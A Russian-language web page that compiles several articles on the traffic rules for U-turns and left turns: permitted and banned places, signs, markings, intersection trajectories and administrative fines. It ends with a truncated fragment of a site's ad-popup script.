Правила разворотов и поворотов

Где можно выполнить разворот?

Добрый день, уважаемый читатель.

В этой статье будет рассмотрен маневр «разворот», а также пункты правил дорожного движения, относящиеся к развороту. Речь пойдет о том, где можно выполнить разворот, а где данный маневр запрещен.

Кроме того, будет рассмотрено несколько нестандартных вариантов, позволяющих выполнить разворот на дороге с интенсивным движением.

Правила выполнения разворота

Разворот можно выполнить в любом месте, где это не запрещено правилами, дорожными знаками или разметкой. Условия, при которых разворот запрещен, будут рассмотрены ниже.

Тем не менее при выполнении разворота нужно очень внимательно относиться к выбору места для маневра. В общем случае возможны 2 варианта:

  • разворот на перекрестке;
  • разворот вне перекрестка.

Разворот на перекрестке

Правила разворота на перекрестке регулируются пунктом 8.5 ПДД:

8.5. Перед поворотом направо, налево или разворотом водитель обязан заблаговременно занять соответствующее крайнее положение на проезжей части, предназначенной для движения в данном направлении, кроме случаев, когда совершается поворот при въезде на перекресток, где организовано круговое движение.

Таким образом разворот на перекрестке должен выполняться из крайнего левого положения, т.е. от центра проезжей части.

Обратите внимание на этот пункт. Например, выполнить разворот на перекрестке, где пересекаются две неширокие двухполосные дороги, без нарушения правил дорожного движения невозможно. Чтобы не выехать на газон или тротуар водителю придется либо нарушить требования пункта 8.5 (развернуться из крайнего правого положения), либо включить задний ход на перекрестке (нарушить пункт 8.12 ПДД).

Разворот вне перекрестка

Разворот вне перекрестка подчиняется другим правилам:

8.8. При повороте налево или развороте вне перекрестка водитель безрельсового транспортного средства обязан уступить дорогу встречным транспортным средствам и трамваю попутного направления.

Если при развороте вне перекрестка ширина проезжей части недостаточна для выполнения маневра из крайнего левого положения, его допускается производить от правого края проезжей части (с правой обочины). При этом водитель должен уступить дорогу попутным и встречным транспортным средствам.

Вне перекрестка разворот можно выполнить как от центра проезжей части, так и от ее правого края. В том числе можно начать разворот и с правой обочины. Второй вариант, безусловно, является наиболее предпочтительным. Легковой автомобиль, который начал разворот с обочины, даже на двухполосной дороге сможет завершить маневр без включения передачи заднего хода. Если же вписаться не удалось, то вне перекрестка правила не запрещают включить задний ход.

На практике выполнять разворот вне перекрестка обычно удобнее, чем на перекрестке.

Где запрещен разворот?

Рассмотрим ситуации, в которых правила дорожного движения запрещают выполнить разворот:

1. Пешеходные переходы

Пешеходные переходы, обозначенные соответствующими знаками или разметкой.

В тоннелях. Тоннели обозначаются дорожным знаком 1.31:

3. Мосты, путепроводы, эстакады

На мостах, путепроводах, эстакадах и под ними разворачиваться также нельзя. Данные сооружения не обозначаются специальными дорожными знаками или разметкой. Поэтому на практике нужно быть внимательным, чтобы случайно не развернуться, например, на эстакаде. Дело в том, что насыпь может перейти в эстакаду незаметно для водителя.

4. Железнодорожные переезды

Разворот запрещен на железнодорожных переездах. Границы переездов обозначаются знаками 1.3.1 или 1.3.2, либо местом установки шлагбаума:

5. Места с небольшой видимостью

В местах с видимостью менее 100 метров. Такие места не обозначаются специальными дорожными знаками, поэтому водитель должен определить их самостоятельно. Тем не менее можно ориентироваться по следующим дорожным знакам:

Еще раз отмечу, что перечисленных знаков может и не быть.

Например, видимость может быть ограничена ветвями деревьев и в этом случае выполнять разворот нельзя.

6. Остановки.

Нельзя разворачиваться и на остановках общественного транспорта, обозначенных знаками или разметкой:

7. При наличии знаков

Разворот запрещен при наличии следующих дорожных знаков:

8. При наличии разметки

Также автомобиль нельзя развернуть при наличии сплошной линии разметки на пути следования:

Как развернуться на дороге с оживленным движением?

Водители, которые хотя бы раз выполняли разворот на практике, могли столкнуться со следующими проблемами:

  • интенсивное движение встречных и попутных автомобилей;
  • недостаточная ширина проезжей части (зачастую ширина ограничена автомобилями, припаркованными у края проезжей части).

Если Вы столкнулись с одной из перечисленных проблем, то выполнить стандартный разворот вряд ли удастся. Поэтому рассмотрим нестандартные схемы:

Разворот с использованием прилегающей территории

В данном случае нужно выбрать прилегающий к дороге двор, парковку, АЗС и т.п. Лучше выбрать прилегающую территорию слева по ходу движения. Связано это с тем, что впоследствии выезжать из двора гораздо проще направо, чем налево.

Уверен, многие водители помнят вариант разворота, предложенный в экзаменационных билетах ГИБДД. ГИБДД предлагает въехать на прилегающую территорию, а затем задним ходом вернуться на основную дорогу. Однако при интенсивном движении такой маневр выполнить довольно сложно. Поэтому просто въезжайте на прилегающую территорию и разворачивайтесь там. Движение на прилегающих территориях практически отсутствует, поэтому можно развернуться даже на самом маленьком «пятачке». Пусть даже для этого придется включить задний ход несколько раз.

Разворот вокруг квартала

В данном случае нужно выполнить разворот, объехав квартал по траектории в форме прямоугольника. Т.е. на первом перекрестке нужно повернуть направо, на следующих двух — также направо, на четвертом — налево. Данный вариант применяется лишь в том случае, когда выбранный район состоит из прямоугольных кварталов. В городах с хаотичной застройкой такой вариант не подойдет.

Штрафы за нарушение правил разворота

Статья 12.14 КоАП:

1. Невыполнение требования Правил дорожного движения подать сигнал перед началом движения, перестроением, поворотом, разворотом или остановкой —

влечет предупреждение или наложение административного штрафа в размере пятисот рублей.

1 1 . Невыполнение требования Правил дорожного движения, за исключением установленных случаев, перед поворотом направо, налево или разворотом заблаговременно занять соответствующее крайнее положение на проезжей части, предназначенной для движения в данном направлении, —

влечет предупреждение или наложение административного штрафа в размере пятисот рублей.

2. Разворот или движение задним ходом в местах, где такие маневры запрещены, за исключением случаев, предусмотренных частью 3 статьи 12.11 и частью 2 статьи 12.16 настоящего Кодекса, —

влечет наложение административного штрафа в размере пятисот рублей.

Статья 12.16 КоАП:

2. Поворот налево или разворот в нарушение требований, предписанных дорожными знаками или разметкой проезжей части дороги, —

влечет наложение административного штрафа в размере от одной тысячи до одной тысячи пятисот рублей.

Таким образом нарушение правил разворота в разных условиях влечет штраф в размере от 500 до 1 500 рублей.

Разворот: сложный маневр или самое обычное дело?

Большинство водителей предпочитают не совершать разворот без особой надобности, предпочитая проехать квартал-другой. Причины этого кроются в позиционировании разворота как сложного и опасного маневра, с одной стороны, и незнании правил разворота, с другой. И если с первым постулатом можно соглашаться, то второе объяснение не выдерживает критики. Правила надо знать и четко выполнять их предписания, дабы не бояться ответственности.

Попробуем восполнить пробел в знаниях некоторых водителей по вопросу правил разворота.

Принципы разворота: требования знаков и разметки

Дорожные знаки, регламентирующие разворот

В ПДД есть специальные дорожные знаки, указывающие на участок, где можно совершить этот маневр: «Место для разворота» (6.3.1), «Зона для разворота» (6.3.2).

Обозревая данные знаки, водитель должен понимать: «Вот оно законное место для осуществления разворота!». И ничего опасаться не надо.

Главное помнить, что разворот в таком месте должен начинаться из крайне левого положения на крайне левой полосе.

Однако в ПДД большее место занимают не правила осуществления разворота, а нормы, запрещающие это делать. Существует специальный дорожный знак, категорически запрещающий указанный маневр, – «Разворот запрещен» (3.19).

Он устанавливается перед перекрестками и запрещает маневр как раз на этом участке.

Запрещают разворот и семейство предписывающих знаков, исключающих левый поворот (а, следовательно, и разворот):

— «Движение прямо» (4.1.1);

— «Движение направо» (4.1.2);

— «Движение прямо и направо» (4.1.4).

Не предоставляет право разворота и дорожный знак «Дорога с односторонним движением» (5.5), ибо, развернувшись на таком участке, водитель автоматически попадает на полосу (или полосы), которые предназначаются только для встречных ТС.

Исключают маневр разворота еще два дорожных знака — «Направления движения по полосам» (5.15.1) и «Направления движения по полосе» (5.15.2). Если, конечно, из крайне левой полосы будет запрещен левый поворот.

Разметка, регламентирующая разворот

С горизонтальной дорожной разметкой проще, чем со знаками: маневр разворота запрещается на участках дорог, на которых нанесены:

— двойная сплошная (1.3);

— двойная (сплошная, рядом прерывистая) – со стороны сплошной (1.11).

Запрещают разворот и те варианты горизонтальной разметки 1.18 (говорящие о направлениях движения по полосам), которые не позволяют из крайне левой полосы совершать левый поворот.

Прерывистые линии разметки разрешают выполнять интересующий нас маневр (если он не запрещен иными требования ПДД).

Общие правила разворота: требования раздела 8 ПДД

Перед началом разворота водителю предписывается заранее занять крайне левое положение на крайне левой полосе. (На двусторонней дороге – крайне левое положение на «своей» полосе).

Если на дороге присутствуют трамвайные пути, размещающиеся слева от водителя, то разворот на таком участке необходимо проводить с предварительным выездом ТС на трамвайные пути, предназначенные для попутного направления (при несоздании, конечно же, помех для движения трамвая).

Но надо помнить, что, если знаками «Направления движения по полосам» (5.15.1), «Направления движения по полосе» (5.15.2), а также разметкой 1.18 предписывается какой-то другой порядок движения (в иных направлениях, исключающих поворот налево либо разворот), то предварительный выезд на трамвайные пути перед разворотом категорически запрещается.

Водитель обязан исполнять предписания разметки либо знаков.

Из данного правила есть исключение.

Если размеры (габариты) ТС или ширина дороги (проезжей части) не предоставляют возможности выполнить разворот из крайне левой полосы и крайне левого положения, то на участке ВНЕ ПЕРЕКРЕСТКА разрешается совершать разворот даже из правого положения, а также обочины (если подобный маневр не запрещает разметка либо знаки).

Как это парадоксально и не звучит, но в 8 разделе ПДД нет норм, которые специально регламентировали бы траекторию разворота. То есть траектория движения при развороте законодательно не определена. Главное, не нарушать имеющихся требований.

Условия запрещения разворота: положения п.8.11 ПДД

Запрет выполнения маневра разворота в реальной практике дорожного движения может регламентироваться не только знаками или разметкой. Согласно п.8.11 Правил, есть шесть участков дорог, на которых безоговорочно и категорически запрещается выполнять разворот. Рассмотрим эти участки.

1. Пешеходные переходы.

Запрет разворота на пешеходных переходах (регулируемых и нерегулируемых) объясняется тем, что в процессе выполнения маневра можно создать опасность для пешеходов, пересекающих проезжую часть по переходу и пользующихся на нем преимуществом.

2. Места остановок маршрутного транспорта.

При развороте на автобусных остановках и в непосредственной близости от них существует опасность смещения траектории маневра и наезда на пешеходов (будущих пассажиров), стоящих на остановках.

3. Железнодорожные переезды.

Запрет на разворот на ж/д переезде обусловлен опасностью такого участка дороги, а также узостью проезжей части, когда невозможно развернуться без применения движения задним ходом и потери времени.

4. Мосты, путепроводы, эстакады и участки дороги под ними.

Опасность искусственных сооружений состоит в ограниченности пространства, необходимого для разворачивания на 180 градусов, поэтому ошибка в планировании разворота может привести к выходу за пределы участка и даже вылету с большой высоты.

Ограниченность пространства и низкая способность к маневрированию объясняет данный запрет разворота.

6. Условия ограниченной видимости.

При наличии 100-метровой дистанции водитель встречного авто может вовремя среагировать на неправильный разворот и – тем самым – избежать ДТП. При ограниченности обзора такая возможность пропадает.

Прочие случаи, запрещающие разворот

Разворот запрещается на автомагистрали (знак 5.1) и дороге для автомобилей (знак 5.3): запрещается использоваться для этого технологические разрывы, созданные в разделительной полосе.

Разворот на таких дорогах разрешен только в специально отведенных местах, оснащенных уже известными знаками — «Место для разворота» (6.3.1) и «Зона для разворота» (6.3.2).

Осуществление разворотов на перекрестках

Особо выделим разворот на перекрестке. Это необходимо сделать потому, что многие обыватели и даже сами водители полагают, что «в чистом виде» на перекрестке разворачиваться запрещается.

Это в корне неверно. Если взять общие правила разворота, то ПДД не регламентирует ни разрешения, ни запрета такого маневра. Значит, — разворот на перекрестках разрешен (если при его применении не используется задний ход, запрещенный на перекрестках).

ПДД не затрагивают и вопроса о «правильной» траектории разворота. Любая траектория возможна при соблюдении двух требований:

1) перед разворотом надо занять крайне левое положение на крайне левой полосе (кроме случаев разворота на перекрестках с круговым движения);

2) при выезде с перекрестка нельзя будет оказаться на «встречке».

Отметим только два существенных момента.

1. Разворот на «кольце» (круговом движении) возможен только при проезде всего «кольца».

2. А вот как быть в этой ситуации (на рисунке ниже)?

Некоторые водители совершают ошибку, двигаясь по любой траектории. Это неверная позиция. Попробуем пояснить.

На рисунке представлен не разворот, а два последовательных левых поворота. Первый поворот, затем движение в разрыве разделительной полосы, второй поворот. А согласно п.8.6 Правил, при выезде с левого поворота нельзя оказываться на полосе-«встречке».

Поэтому движение на перекрестке (похожее на разворот, но являющееся двойным левым поворотом) возможно только по траектории А.

Административная ответственность за нарушение правил разворота

В КоАП РФ отражены санкции, которыми «вознаграждаются» водители за нарушение правил разворота. Таких санкций – 3 вида.

  1. Штраф 500 рублей выписывается за нарушение правил разворота (за исключением разворота на автомагистрали, а также нарушений знаков и разметки).
  2. Штраф 1000-1500 рублей – за нарушение требований к развороту, предъявляемых разметкой и знаками.
  3. Штраф 2500 рублей – за нарушение правил при развороте на автомагистрали.

Вместо заключения

Таким образом, ПДД крайне незначительно отражает вопрос о развороте ТС. Доподлинно известно, что в подавляющем числе случаев водитель должен принять как можно левее для разворота. Что касается траектории совершения маневра, то разворот в этом сегменте никак не регламентируется. При завершении маневра нельзя оказаться на встречных полосах.

Таковы теоретические выкладки ПДД, связанные с разворотом. А опыт придет к Вам в процессе непосредственного движения по дорогам.

Выполнение разворота на перекрестке — правила, меры безопасности и штрафы

Несмотря на то, что выполнять разворот умеют все водители, сделать это правильно на перекрестках различных типов без нарушения ПДД бывает сложно, так как нужно учитывать множество нюансов. Совершение данного маневра требует от водителя не только внимательности, но и знания того, какой вид транспорта имеет преимущество на тех частях дороги, которые регулируются или не регулируются светофорами.

Все особенности нужно учитывать не столько для сдачи экзамена с целью получения права на вождение, сколько при ежедневном вождении, чтобы не провоцировать аварийных ситуаций и ДТП, лишения прав и выписки штрафа.

Что говорят ПДД о правилах разворота

В своде правил дорожного движение пункт № 8 посвящен описанию правильного разворота. Общие правила для водителей, предотвращающие возникновения ДТП:

  1. Перед совершением такого маневра нужно подать сигнал с помощью светового указателя с той стороны, в которую поворачивает машина. При отсутствии такой возможности дать сигнал нужно рукой, согнув ее в локте под прямым углом.
  2. Сигнал нельзя подавать в момент поворота: это нужно сделать заранее, и завершить сразу же после его выполнения.
  3. Поворачивая налево или направо, водителю нужно занять крайнее положение на дороге. Это не относится только к тем случаям, когда нужно повернуть, въезжая на перекресток.

Правила поворотов на перекрестках

  • Разворот нужно осуществлять так, чтобы машина не оказалась на стороне встречного потока автомобилей.
  • Если есть полоса торможения, то снижать скорость перед маневром нужно только на ней.
  • Согласно ПДД, нельзя поворачивать в местах повышенной опасности: пешеходных переходах, тоннелях, мостах, остановках, ЖД переездах, местах с ограниченной или плохой видимостью проезжей части.
  • Если ТС не может повернуть по правилам вследствие своих габаритов или иных причин, отступление от правил допускается. Однако помех и опасности для других автомобилей при этом возникнуть не должно.
  • Как правильно выполнить разворот на перекрестке на экзамене

    Для того чтобы успешно сдать экзамен на получение прав, достаточно учесть несколько нюансов и соблюдать выученные правила. Основные из них, касающихся поворотов:

  1. Сворачивая направо/налево, нужно заранее занимать крайнее положение на дороге, которая предназначается для движения в таком направлении. Это не касается перекрестка, на котором установлено круговое движение.
  2. При повороте направо ТС должно находиться по возможности близко к правому краю дороги.
  3. Если совершается левый поворот, иногда можно выезжать на полосу, которая нужна для встречного движения, хотя это запрещается правилами в большинстве случаев.
  4. Наиболее часто правила разворота нарушаются в зимнее время года. Основная причина – скрытое под снегом дорожное покрытие и образование колеи.

Нужно учесть, что ширина дороги не ограничена накатанным участком. Нельзя забывать занимать крайнее положение, чтобы выполнить маневр.

  • Нельзя делать разворот на «зебре»: даже наезд на эту часть дороги может привести к несдаче экзамена.
  • Нельзя разворачиваться вне перекрестка, если видимость на 100 и более метров отсутствует.
  • Обязательно включать нужные указатели поворотов при совершении маневров.
  • Схемы и правила выполнения разворота на различных перекрестках

    Правила разворота зависят от типа перекрестка, на котором совершается маневр. При этом у некоторых видов транспорта есть преимущества в дорожном движении, что также нужно учитывать при разворотах.

    Регулируемых

    На перекрестке, который регулируется светофором, выполнять такой маневр проще всего, так как водителю нужно только пропустить встречный поток машин. Справа и слева движение будет остановлено сигналом светофора. От водителя требуется:

    • соблюдение направления движения по разметке;
    • удостоверение в том, что перед перекрестком нет знака, который воспрещает маневр.

    Поворот на регулируемом перекрестке

    Равнозначных

    У равнозначного перекрестка есть три основных признака: он не регулируется, знаки приоритета отсутствует, покрытие на пересекаемых дорогах одинаковое. Чтобы правильно развернуться в таком месте, водителю нужно знать, кто «главнее»:

    • трамвай имеет преимущество перед авто, независимо от того, куда он движется;
    • водители безрельсовых ТС обязаны уступать дорогу тем авто, что движутся справа;
    • если справа ТС нет, движение можно начинать.

    Поворот на равнозначном перекрестке

    Практически любой легковой транспорт может развернуться на перекрестке такого типа. Исключение могут составлять крупногабаритные авто, радиус разворота у которых слишком большой. Чтобы выполнить данное действие, нужно найти наиболее безопасное место: здесь нельзя двигаться задним ходом (штраф – 500 рублей) и выполнять серию разворотов. Общие правила для безопасного движения:

    • нужно руководствоваться знаками «Главная дорога», «Стоп» и «Уступи дорогу»;
    • если на перекрестке отсутствуют любые знаки, главное правило для водителей – «Помеха справа»;
    • при движении включение указателей поворота обязательно;
    • когда трасса узкая, требуется движение по дальней траектории, по ближней – если дорога широкая.

    Поворот на Т-образном перекрестке

    С трамвайными путями

    В соответствии с ПДД, у рельсового транспорта есть преимущество перед остальными его типами. Первый уступает дорогу легковым ТС только если он сам осуществляет движение по примыкающей дороге, а машина – по главной.

    Когда для машины горит зеленый свет, а для трамвая – красный, последний стоит. Однако он может начинать движение на стрелку, которая была включена вместе с красным знаком светофора – а это нарушение.

    Если на перекрестке нет светофора, то за трамваем также будет преимущество.

    С разделительной полосой

    На дорогах с таким типом разметки есть 2 способа разворота: когда полоса достигает перекрестка, или пересекает его:

    1. Первый случай требует выполнения маневра только по малой траектории, так как на таких дорогах обычно достаточно места. Заезд на пересечение дорог строго запрещен и наказывается штрафом.
    2. Во втором случае правилами разрешен поворот исключительно по большому радиусу, иначе ТС будет некоторое время продолжать движение по встречной полосе, что также не разрешено.

    Поворот на дороге с разделительной полосой

    Но нужно учесть:

    • совершая маневр, нужно принять во внимание то, насколько широка разделительная полоса;
    • если она просторная, а водитель разворачивается по малому радиусу, ему грозит лишение прав;
    • когда линия узкая (около 20 см), никакого штрафа не будет, так как встречное движение не интенсивное.

    Со светофором

    Когда на пересечении дорог установлен светофор, выполнение разворота является безопасным и простым. Общие правила на такой дороге:

    • водитель разворачивающегося авто должен соблюдать траекторию движения согласно полосам;
    • поворот возможен только в местах, где нет запрещающего такого маневра знаков;
    • начало движения разрешено только по соответствующему сигналу светофора.

    Разворот на перекрестке со светофором

    За что можно лишиться прав при неправильном развороте

    Водителя не всегда лишают прав при нарушении правил разворота на перекрестке. В некоторых случаях наказанием также может служить штраф:

    1. Если выбрать неверную траекторию и выполнить разворот с выездом на границу перекрестка, можно оказаться на встречной полосе. При первом нарушении правил ПДД минимальный размер штрафа – наиболее мягкого наказания – будет составлять 5 000 рублей. Когда фиксируется повторное нарушение, возможно лишение прав на 4-6 месяцев. Еще один выезд на встречную полосу грозит лишением ВУ на 1 год.
    2. Водителя не лишают прав, если при неправильном маневре автомобиль выехал за пределы границ пересечения 2 дорог.

    Возможен только штраф размером 1 500 рублей.

  • Постановление о штрафе в 500 рублей выписывается, когда транспортное средство движется задним ходом или выполняет поворот в несколько этапов на Т-образном перекрестке. Так как такие действия сильно повышают риск возникновения аварийной ситуации, при еще одном подобном нарушении возможно лишение права на вождение.
  • Отобрать права могут и за разворот по малому радиусу на перекрестке, где есть разделительная полоса. Срок, на который право водить машину отсутствует – 4-6 месяцев.
  • Такое нарушение считается законодательством серьезным, и наказание за него соответствующее, так как автомобиль оказывается на встречной полосе движения.

    Правила поворотов и разворотов

    Кроме движения в прямом направлении мы совершаем маневры — повороты, развороты, перестроения. Все это требует особого внимания.

    В первую очередь важно убедиться, что Ваш маневр ни кому не помешает т.е. будет безопасным . А также необходимо информировать окружающих о своих действиях, т.е. каждый маневр обозначать включением указателей поворотов.

    Начиная движение Вы должны уступить дорогу тем транспортным средствам которые уже движутся, они имеют, по отношению к Вам преимущество .

    При перестроении из одного ряда в другой необходимо соблюдать основное правило: кто перестраивается — тот и уступает , и только в случае одновременных перестроений преимущество имеет то транспортное средство, которое приближается с правой стороны.

    Если траектории движения транспортных средств пересекаются, а очередность движения не оговорена правилами, необходимо уступить дорогу транспортному средству находящемуся с правой стороны (п.8.9.ПДД)

    Если Вы собираетесь совершить поворот направо, то здесь все просто. Занимаем заранее крайнее правое положение, обязательно снижаем скорость и стараемся двигаться как можно правее, т.е. поворачиваем тоже в крайний правый ряд.

    С поворотом налево немного сложнее. Занимаем крайнее левое положение своего направления и, пропустив встречные автомобили, поворачиваем таким образом, чтобы не оказаться на проезжей части встречного направления (п.8.6.ПДД). При этом со встречными ТС, чаще всего, Вы будете разъезжаться правыми бортами. Главное обеспечить безопасность движения.

    Могут быть ситуации, когда повороты направо или налево можно совершать не только из крайних положений. Это возможно только в случае установки знаков «Направления движения по полосам» (5.15.1., 5.15.2 ПДД).

    Если Вам необходимо развернуться то всегда занимаем крайнее левое положение и по аналогии с левым поворотом совершаем данный маневр..

    Если транспортное средство из-за своих габаритов не может выполнять выше перечисленные требования Правил, то можно от них отойти, при условии обеспечения безопасности данного маневра.

    Совершить разворот можно несколькими способами. Чаще всего это будет разворот с использование заднего хода, т.к. свободной территории недостаточного для совершения разворота в одно движение передним ходом.

    Если Вы совершаете разворот на перекрестке то движение задним ходом в этом случае запрещено . На рисунках показаны способы разворота на участе дороги, а также вне перекрестка с использованием прилегающей территории справа или слева.

    МЕСТА ГДЕ ЗАПРЕЩАЕТСЯ РАЗВОРОТ И ДВИЖЕНИЕ ЗАДНИМ ХОДОМ:

    1 . Пешеходный переход
    2 . Тоннели
    3 . Мосты, путепроводы, эстакады и под ними,
    4 . Железнодорожные переезды.
    5 . Места с видимостью дороги хотя бы в одном направлении менее 100м.
    6 . Места остановок маршрутных ТС
    7 . На дороге обозначенной знаком «Автомагистраль».

    Если Вам необходимо выехать задним ходом с места имеющего ограниченную видимость, то самый хороший вариант прибегнуть к помощи других лиц, но не всегда есть такая возможность. Чаще это приходиться делать самостоятельно.

    Значит выезжаем очень медленно и аккуратно и слушаем, не подает ли кто звуковой сигнал. Если слышим звуковой сигнал — надо сразу нажать на педаль тормоза (даже если окажется, что сигналили не Вам).

    Поворот налево и разворот на перекрёстке. Правила проезда

    Если вы недавно сдали на права или же просто забыли ПДД, давайте освежим память и вспомним, какими пунктами ПДД нужно руководствоваться, совершая поворот налево и разворот на перекрёстке. Либо самостоятельно протестировать в онлайн- режиме билеты ПДД для экзаменационной подготовки к сдаче теории ПДД.

    Учитывая то, что перекрёстки бывают разные, на каждом из них следует чётко понимать траектории разрешённого движения для проезда пересечений без нарушений правил дорожного движения. Иначе можно спровоцировать аварию или лишиться водительского удостоверения.

    Поворот налево и разворот на перекрёстке

    Самое главное правило при совершении поворотов и разворотов на перекрёстках — при выезде с пересечения проезжих частей ваш автомобиль не должен оказаться на полосе встречного движения. Чтобы понять это правило, нужно для начала разобраться, что такое пересечение проезжих частей.

    На рисунке пунктирными линиями обозначены пересечения проезжих частей. Их на этом перекрёстке 4, потому что имеются разделительные полосы. Если бы разделительных полос на данном перекрёстке не было, здесь было бы только одно пересечение проезжих частей — область, объединяющая площади 1,2,3,4 на рисунке.

    Разворот на перекрёстке

    Чтобы совершить разворот на перекрёстке с разделительными полосами, нужно сначала занять крайнее левое положение. То есть не доезжая до области 1, занимаем крайний левый ряд (около разделительной полосы) и включаем поворотник.

    Если вы начнёте разворачиваться по малому радиусу, тогда вы сразу же попадёте на площадь между областями 1 и 4 (где нарисована красная точка). Эта площадь уже не является пересечением проезжих частей, а значит вы окажетесь на полосе встречного движения — это нарушение и наказывается штрафом с лишением прав.

    Чтобы не нарушая ПДД, правильно совершить разворот на указанном перекрёстке, нужно пересечь площадь 1 по прямой и остановиться в начале площади 2 (в её левом нижнем углу). Затем вы должны обязательно пропустить поток встречных автомобилей. Только после этого можно разворачиваться, последовательно пересекая площади 3 и 4.

    Таким образом, после выезда с пересечений проезжих частей (после выезда из любой области — 1,2,3 или 4) вы не оказываетесь на полосе встречного движения, а следовательно не нарушаете данный пункт правил.

    Поворот налево на перекрёстке


    При повороте налево действуют такие же правила. Самое главное — не выезжайте на полосу встречного движения. На рисунке представлены траектории движения по перекрёстку при повороте для разъезда со встречным потоком автомобилей, поворачивающих также налево.

    Для совершения поворота вы должны выехать на пересечение проезжих частей, не доезжая до центра перекрёстка, чтобы была возможность разъехаться со встречным потоком. Будьте внимательны — вы должны пропустить встречные авто, едущие прямо, а из-за встречных поворачивающих автомобилей их плохо видно. Обычно в таких случаях нужно дождаться, когда обзор откроется, убедиться, что встречных машин нет и совершить поворот.

    На практике бывает, что поворачивают из двух рядов сразу же, причём выезжают прямо на середину перекрёстка или даже дальше. Если вам создадут помеху, не поддавайтесь провокациям, действуйте согласно обстановке, но не выезжайте на встречную полосу.

    Можно остановиться чуть раньше, а можно вообще не выезжать на перекрёсток, если там создался затор из автомобилей. Кстати, по правилам выезжать на такой перекрёсток нельзя. Нужно сначала убедиться, что движение рабочее и вы не создадите дополнительных помех, если выедите на пересечение.

    Разворот на перекрёстке с трамвайными путями


    ПДД, пункт 8.5, второй абзац. При наличии слева трамвайных путей попутного направления на одном уровне с проезжей частью поворот налево и разворот должны выполняться с них, если знаками или разметкой не предписан иной порядок движения. При этом не должно создаваться помех трамваю .

    На рисунке мы видим, что знаками указаны полосы для движения на данном перекрёстке. Для поворота налево используется крайняя левая полоса. Она же используется для движения прямо. Значит по правилам нужно выполнять разворот из крайнего левого ряда, не заезжая на трамвайные пути.

    При развороте вы должны убедиться, что нет трамвая попутного направления, а если он есть в левом зеркале заднего вида, то пропустить его. Затем вы должны пропустить трамваи встречного направления, поток встречных автомобилей и лишь потом развернуться.

    Обратите внимание на траектории разворотов, указанных на рисунке. Здесь пересечение проезжих частей одно, поэтому можно совершить разворот по малому радиусу.

    Разворот вне перекрёстка на дороге с трамвайными путями:

    На практике в городе можно выполнять разворот с трамвайных путей попутного направления. При большом потоке машин, в этом случае освобождаются две полосы для движения и не создаётся затора. С другой стороны, это может создать помеху трамваю попутного направления, поэтому перед выездом на трамвайные пути обязательно убедитесь, что его поблизости нет. А то в городе можно часто наблюдать картину, когда трамвай стоит на перекрёстке и не может проехать из-за столпившихся на поворот машин, хотя он имеет приоритет и проехать должен первым.


    Чтобы совершить разворот вне перекрёстка на дороге с трамвайными путями, нужно для начала убедиться в отсутствии трамваев попутного направления, посмотрев в зеркало заднего вида. Затем нужно выехать на трамвайные пути попутного направления, при необходимости остановиться, чтобы пропустить встречные трамваи и поток встречных автомобилей. Пропустив их и убедившись, что манёвр безопасен, можно смело разворачиваться, не нарушив ПДД.

    Итак, мы с вами рассмотрели основные варианты разворотов и поворотов налево на перекрёстках с трамавайными путями и без них. В заключение приведу выдержку из правил дорожного движения про то, где разворот запрещён.

    ПДД, пункт 8.11. Разворот запрещается:
    — на пешеходных переходах;
    — в тоннелях;
    — на мостах, путепроводах, эстакадах и под ними;
    — на железнодорожных переездах;
    — в местах с видимостью дороги хотя бы в одном направлении менее 100 м;
    — в местах остановок маршрутных транспортных средств.

    Не нарушайте ПДД и разворачивайтесь правильно, тогда минимален риск попасть в аварию, а также не за что вас оштрафовать. Всегда приятно соблюдать правила, ведь когда вы уверены на дороге, вы спокойны, а спокойствие и хладнокровие на дороге — очень важные вещи.

    Ссылка на основную публикацию
    Adblock
    detector
    ":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
    '+c+"
    "),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
    Закрыть через '+o.how.outgoing.timer_count+"
